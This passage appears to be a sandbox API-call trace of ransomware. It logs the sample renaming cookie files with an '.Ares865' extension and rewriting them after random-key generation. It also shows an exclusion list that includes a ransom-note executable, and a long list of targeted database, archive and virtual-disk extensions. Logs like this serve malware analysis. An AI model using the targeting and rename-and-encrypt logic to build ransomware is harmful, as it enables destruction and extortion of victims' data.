szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.621] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.621] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.621] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4d0, lpName=0x0) returned 0x124 [0107.624] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4d0) returned 0x190000 [0107.625] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.628] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.628] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.628] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.Ares865") returned 83 [0107.628] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.630] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.630] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=130) returned 1 [0107.631] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.631] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.631] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.631] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0107.633] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0107.634] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.635] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.635] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.635] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.Ares865") returned 89 [0107.635] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.ares865"), dwFlags=0x1) returned 1 [0107.637] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.638] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=272) returned 1 [0107.638] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.639] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.639] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.639] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x124 [0107.644] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0107.645] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.646] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.646] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.647] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt.Ares865") returned 84 [0107.647] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt.ares865"), dwFlags=0x1) returned 1 [0107.648] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.649] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=598) returned 1 [0107.649] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.650] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.650] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.650] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x560, lpName=0x0) returned 0x124 [0107.652] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x560) returned 0x190000 [0107.652] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.653] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.653] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.654] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.Ares865") returned 84 [0107.654] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt.ares865"), dwFlags=0x1) returned 1 [0107.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[3].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[3].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.655] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=196) returned 1 [0107.656] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.656] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.656] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.657] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d0, lpName=0x0) returned 0x124 [0107.659] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d0) returned 0x190000 [0107.661] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.666] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.666] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.668] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt.Ares865") returned 84 [0107.669] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt.ares865"), dwFlags=0x1) returned 1 [0107.673] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[4].txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.675] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=543) returned 1 [0107.676] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.679] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.680] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.680] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x520, lpName=0x0) returned 0x124 [0107.681] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x520) returned 0x190000 [0107.682] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.682] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.682] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.683] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0107.683] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="aoldtz.exe") returned -1 [0107.683] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2=".") returned 1 [0107.683] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="..") returned 1 [0107.683] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="windows") returned -1 [0107.683] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="bootmgr") returned -1 [0107.683] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="temp") returned -1 [0107.683] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="pagefile.sys") returned -1 [0107.683] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="boot") returned -1 [0107.683] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="ids.txt") returned -1 [0107.683] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="ntuser.dat") returned -1 [0107.683] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="perflogs") returned -1 [0107.683] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2="MSBuild") returned -1 [0107.683] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@linkedin[1].txt") returned 36 [0107.683] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[4].txt") returned 76 [0107.683] lstrcpyW (in: lpString1=0x2cce454, lpString2="5p5nrgjn0js_halpmcxz@linkedin[1].txt" | out: lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt") returned="5p5nrgjn0js_halpmcxz@linkedin[1].txt" [0107.683] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@linkedin[1].txt") returned 36 [0107.683] lstrlenW (lpString="Ares865") returned 7 [0107.683] lstrcmpiW (lpString1="[1].txt", lpString2="Ares865") returned -1 [0107.683] lstrlenW (lpString=".dll") returned 4 [0107.684] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2=".dll") returned 1 [0107.684] lstrlenW (lpString=".lnk") returned 4 [0107.684] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2=".lnk") returned 1 [0107.684] lstrlenW (lpString=".ini") returned 4 [0107.684] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2=".ini") returned 1 [0107.684] lstrlenW (lpString=".sys") returned 4 [0107.684] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@linkedin[1].txt", lpString2=".sys") returned 1 [0107.684] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@linkedin[1].txt") returned 36 [0107.684] lstrlenW (lpString="bak") returned 3 [0107.684] lstrcmpiW (lpString1="txt", lpString2="bak") returned 1 [0107.684] lstrlenW (lpString="ba_") returned 3 [0107.684] lstrcmpiW (lpString1="txt", lpString2="ba_") returned 1 [0107.684] lstrlenW (lpString="dbb") returned 3 [0107.684] lstrcmpiW (lpString1="txt", lpString2="dbb") returned 1 [0107.684] lstrlenW (lpString="vmdk") returned 4 [0107.684] lstrcmpiW (lpString1=".txt", lpString2="vmdk") returned -1 [0107.684] lstrlenW (lpString="rar") returned 3 [0107.684] lstrcmpiW (lpString1="txt", lpString2="rar") returned 1 [0107.684] lstrlenW (lpString="zip") returned 3 [0107.684] lstrcmpiW (lpString1="txt", lpString2="zip") returned -1 [0107.684] lstrlenW (lpString="tgz") returned 3 [0107.684] lstrcmpiW (lpString1="txt", lpString2="tgz") returned 1 [0107.684] lstrlenW (lpString="vbox") returned 4 [0107.684] lstrcmpiW (lpString1=".txt", lpString2="vbox") returned -1 [0107.684] lstrlenW (lpString="vdi") returned 3 [0107.684] lstrcmpiW (lpString1="txt", lpString2="vdi") returned -1 [0107.684] lstrlenW (lpString="vhd") returned 3 [0107.684] lstrcmpiW (lpString1="txt", lpString2="vhd") returned -1 [0107.684] lstrlenW (lpString="vhdx") returned 4 [0107.684] lstrcmpiW (lpString1=".txt", lpString2="vhdx") returned -1 [0107.684] lstrlenW (lpString="avhd") returned 4 [0107.684] lstrcmpiW (lpString1=".txt", lpString2="avhd") returned -1 [0107.684] lstrlenW (lpString="db") returned 2 [0107.684] lstrcmpiW (lpString1="xt", lpString2="db") returned 1 [0107.684] lstrlenW (lpString="db2") returned 3 [0107.684] lstrcmpiW (lpString1="txt", lpString2="db2") returned 1 [0107.685] lstrlenW (lpString="db3") returned 3 [0107.685] lstrcmpiW (lpString1="txt", lpString2="db3") returned 1 [0107.685] lstrlenW (lpString="dbf") returned 3 [0107.685] lstrcmpiW (lpString1="txt", lpString2="dbf") returned 1 [0107.685] lstrlenW (lpString="mdf") returned 3 [0107.685] lstrcmpiW (lpString1="txt", lpString2="mdf") returned 1 [0107.685] lstrlenW (lpString="mdb") returned 3 [0107.685] lstrcmpiW (lpString1="txt", lpString2="mdb") returned 1 [0107.685] lstrlenW (lpString="sql") returned 3 [0107.685] lstrcmpiW (lpString1="txt", lpString2="sql") returned 1 [0107.685] lstrlenW (lpString="sqlite") returned 6 [0107.685] lstrcmpiW (lpString1="1].txt", lpString2="sqlite") returned -1 [0107.685] lstrlenW (lpString="sqlite3") returned 7 [0107.685] lstrcmpiW (lpString1="[1].txt", lpString2="sqlite3") returned -1 [0107.685] lstrlenW (lpString="sqlitedb") returned 8 [0107.685] lstrcmpiW (lpString1="n[1].txt", lpString2="sqlitedb") returned -1 [0107.685] lstrlenW (lpString="xml") returned 3 [0107.685] lstrcmpiW (lpString1="txt", lpString2="xml") returned -1 [0107.685] lstrlenW (lpString="$er") returned 3 [0107.685] lstrcmpiW (lpString1="txt", lpString2="$er") returned 1 [0107.685] lstrlenW (lpString="4dd") returned 3 [0107.685] lstrcmpiW (lpString1="txt", lpString2="4dd") returned 1 [0107.685] lstrlenW (lpString="4dl") returned 3 [0107.685] lstrcmpiW (lpString1="txt", lpString2="4dl") returned 1 [0107.685] lstrlenW (lpString="^^^") returned 3 [0107.685] lstrcmpiW (lpString1="txt", lpString2="^^^") returned 1 [0107.685] lstrlenW (lpString="abs") returned 3 [0107.685] lstrcmpiW (lpString1="txt", lpString2="abs") returned 1 [0107.685] lstrlenW (lpString="abx") returned 3 [0107.685] lstrcmpiW (lpString1="txt", lpString2="abx") returned 1 [0107.685] lstrlenW (lpString="accdb") returned 5 [0107.685] lstrcmpiW (lpString1="].txt", lpString2="accdb") returned -1 [0107.685] lstrlenW (lpString="accdc") returned 5 [0107.685] lstrcmpiW (lpString1="].txt", lpString2="accdc") returned -1 [0107.685] lstrlenW (lpString="accde") returned 5 [0107.685] lstrcmpiW (lpString1="].txt", lpString2="accde") returned -1 [0107.686] lstrlenW (lpString="accdr") returned 5 [0107.686] lstrcmpiW (lpString1="].txt", lpString2="accdr") returned -1 [0107.686] lstrlenW (lpString="accdt") returned 5 [0107.686] lstrcmpiW (lpString1="].txt", lpString2="accdt") returned -1 [0107.686] lstrlenW (lpString="accdw") returned 5 [0107.686] lstrcmpiW (lpString1="].txt", lpString2="accdw") returned -1 [0107.686] lstrlenW (lpString="accft") returned 5 [0107.686] lstrcmpiW (lpString1="].txt", lpString2="accft") returned -1 [0107.686] lstrlenW (lpString="adb") returned 3 [0107.686] lstrcmpiW (lpString1="txt", lpString2="adb") returned 1 [0107.686] lstrlenW (lpString="adb") returned 3 [0107.686] lstrcmpiW (lpString1="txt", lpString2="adb") returned 1 [0107.686] lstrlenW (lpString="ade") returned 3 [0107.686] lstrcmpiW (lpString1="txt", lpString2="ade") returned 1 [0107.686] lstrlenW (lpString="adf") returned 3 [0107.686] lstrcmpiW (lpString1="txt", lpString2="adf") returned 1 [0107.686] lstrlenW (lpString="adn") returned 3 [0107.686] lstrcmpiW (lpString1="txt", lpString2="adn") returned 1 [0107.686] lstrlenW (lpString="adp") returned 3 [0107.686] lstrcmpiW (lpString1="txt", lpString2="adp") returned 1 [0107.686] lstrlenW (lpString="alf") returned 3 [0107.686] lstrcmpiW (lpString1="txt", lpString2="alf") returned 1 [0107.686] lstrlenW (lpString="ask") returned 3 [0107.686] lstrcmpiW (lpString1="txt", lpString2="ask") returned 1 [0107.686] lstrlenW (lpString="btr") returned 3 [0107.686] lstrcmpiW (lpString1="txt", lpString2="btr") returned 1 [0107.686] lstrlenW (lpString="cat") returned 3 [0107.686] lstrcmpiW (lpString1="txt", lpString2="cat") returned 1 [0107.686] lstrlenW (lpString="cdb") returned 3 [0107.686] lstrcmpiW (lpString1="txt", lpString2="cdb") returned 1 [0107.686] lstrlenW (lpString="ckp") returned 3 [0107.686] lstrcmpiW (lpString1="txt", lpString2="ckp") returned 1 [0107.686] lstrlenW (lpString="cma") returned 3 [0107.686] lstrcmpiW (lpString1="txt", lpString2="cma") returned 1 [0107.686] lstrlenW (lpString="cpd") returned 3 [0107.687] lstrcmpiW (lpString1="txt", lpString2="cpd") returned 1 [0107.687] lstrlenW (lpString="dacpac") returned 6 [0107.687] lstrcmpiW (lpString1="1].txt", lpString2="dacpac") returned -1 [0107.687] lstrlenW (lpString="dad") returned 3 [0107.687] lstrcmpiW (lpString1="txt", lpString2="dad") returned 1 [0107.687] lstrlenW (lpString="dadiagrams") returned 10 [0107.687] lstrcmpiW (lpString1="din[1].txt", lpString2="dadiagrams") returned 1 [0107.687] lstrlenW (lpString="daschema") returned 8 [0107.687] lstrcmpiW (lpString1="n[1].txt", lpString2="daschema") returned 1 [0107.687] lstrlenW (lpString="db-journal") returned 10 [0107.687] lstrcmpiW (lpString1="din[1].txt", lpString2="db-journal") returned 1 [0107.687] lstrlenW (lpString="db-shm") returned 6 [0107.687] lstrcmpiW (lpString1="1].txt", lpString2="db-shm") returned -1 [0107.687] lstrlenW (lpString="db-wal") returned 6 [0107.687] lstrcmpiW (lpString1="1].txt", lpString2="db-wal") returned -1 [0107.687] lstrlenW (lpString="dbc") returned 3 [0107.687] lstrcmpiW (lpString1="txt", lpString2="dbc") returned 1 [0107.687] lstrlenW (lpString="dbs") returned 3 [0107.687] lstrcmpiW (lpString1="txt", lpString2="dbs") returned 1 [0107.687] lstrlenW (lpString="dbt") returned 3 [0107.687] lstrcmpiW (lpString1="txt", lpString2="dbt") returned 1 [0107.687] lstrlenW (lpString="dbv") returned 3 [0107.687] lstrcmpiW (lpString1="txt", lpString2="dbv") returned 1 [0107.687] lstrlenW (lpString="dbx") returned 3 [0107.687] lstrcmpiW (lpString1="txt", lpString2="dbx") returned 1 [0107.687] lstrlenW (lpString="dcb") returned 3 [0107.687] lstrcmpiW (lpString1="txt", lpString2="dcb") returned 1 [0107.687] lstrlenW (lpString="dct") returned 3 [0107.687] lstrcmpiW (lpString1="txt", lpString2="dct") returned 1 [0107.687] lstrlenW (lpString="dcx") returned 3 [0107.687] lstrcmpiW (lpString1="txt", lpString2="dcx") returned 1 [0107.687] lstrlenW (lpString="ddl") returned 3 [0107.687] lstrcmpiW (lpString1="txt", lpString2="ddl") returned 1 [0107.687] lstrlenW (lpString="dlis") returned 4 [0107.688] lstrcmpiW (lpString1=".txt", lpString2="dlis") returned -1 [0107.688] lstrlenW (lpString="dp1") returned 3 [0107.688] lstrcmpiW (lpString1="txt", lpString2="dp1") returned 1 [0107.688] lstrlenW (lpString="dqy") returned 3 [0107.688] lstrcmpiW (lpString1="txt", lpString2="dqy") returned 1 [0107.688] lstrlenW (lpString="dsk") returned 3 [0107.688] lstrcmpiW (lpString1="txt", lpString2="dsk") returned 1 [0107.688] lstrlenW (lpString="dsn") returned 3 [0107.688] lstrcmpiW (lpString1="txt", lpString2="dsn") returned 1 [0107.688] lstrlenW (lpString="dtsx") returned 4 [0107.688] lstrcmpiW (lpString1=".txt", lpString2="dtsx") returned -1 [0107.688] lstrlenW (lpString="dxl") returned 3 [0107.688] lstrcmpiW (lpString1="txt", lpString2="dxl") returned 1 [0107.688] lstrlenW (lpString="eco") returned 3 [0107.688] lstrcmpiW (lpString1="txt", lpString2="eco") returned 1 [0107.688] lstrlenW (lpString="ecx") returned 3 [0107.688] lstrcmpiW (lpString1="txt", lpString2="ecx") returned 1 [0107.688] lstrlenW (lpString="edb") returned 3 [0107.688] lstrcmpiW (lpString1="txt", lpString2="edb") returned 1 [0107.688] lstrlenW (lpString="epim") returned 4 [0107.688] lstrcmpiW (lpString1=".txt", lpString2="epim") returned -1 [0107.688] lstrlenW (lpString="fcd") returned 3 [0107.688] lstrcmpiW (lpString1="txt", lpString2="fcd") returned 1 [0107.688] lstrlenW (lpString="fdb") returned 3 [0107.688] lstrcmpiW (lpString1="txt", lpString2="fdb") returned 1 [0107.688] lstrlenW (lpString="fic") returned 3 [0107.688] lstrcmpiW (lpString1="txt", lpString2="fic") returned 1 [0107.688] lstrlenW (lpString="flexolibrary") returned 12 [0107.688] lstrcmpiW (lpString1="kedin[1].txt", lpString2="flexolibrary") returned 1 [0107.688] lstrlenW (lpString="fm5") returned 3 [0107.688] lstrcmpiW (lpString1="txt", lpString2="fm5") returned 1 [0107.688] lstrlenW (lpString="fmp") returned 3 [0107.688] lstrcmpiW (lpString1="txt", lpString2="fmp") returned 1 [0107.688] lstrlenW (lpString="fmp12") returned 5 [0107.688] lstrcmpiW (lpString1="].txt", lpString2="fmp12") returned -1 [0107.689] lstrlenW (lpString="fmpsl") returned 5 [0107.689] lstrcmpiW (lpString1="].txt", lpString2="fmpsl") returned -1 [0107.689] lstrlenW (lpString="fol") returned 3 [0107.689] lstrcmpiW (lpString1="txt", lpString2="fol") returned 1 [0107.689] lstrlenW (lpString="fp3") returned 3 [0107.689] lstrcmpiW (lpString1="txt", lpString2="fp3") returned 1 [0107.689] lstrlenW (lpString="fp4") returned 3 [0107.689] lstrcmpiW (lpString1="txt", lpString2="fp4") returned 1 [0107.689] lstrlenW (lpString="fp5") returned 3 [0107.689] lstrcmpiW (lpString1="txt", lpString2="fp5") returned 1 [0107.689] lstrlenW (lpString="fp7") returned 3 [0107.689] lstrcmpiW (lpString1="txt", lpString2="fp7") returned 1 [0107.689] lstrlenW (lpString="fpt") returned 3 [0107.689] lstrcmpiW (lpString1="txt", lpString2="fpt") returned 1 [0107.689] lstrlenW (lpString="frm") returned 3 [0107.689] lstrcmpiW (lpString1="txt", lpString2="frm") returned 1 [0107.689] lstrlenW (lpString="gdb") 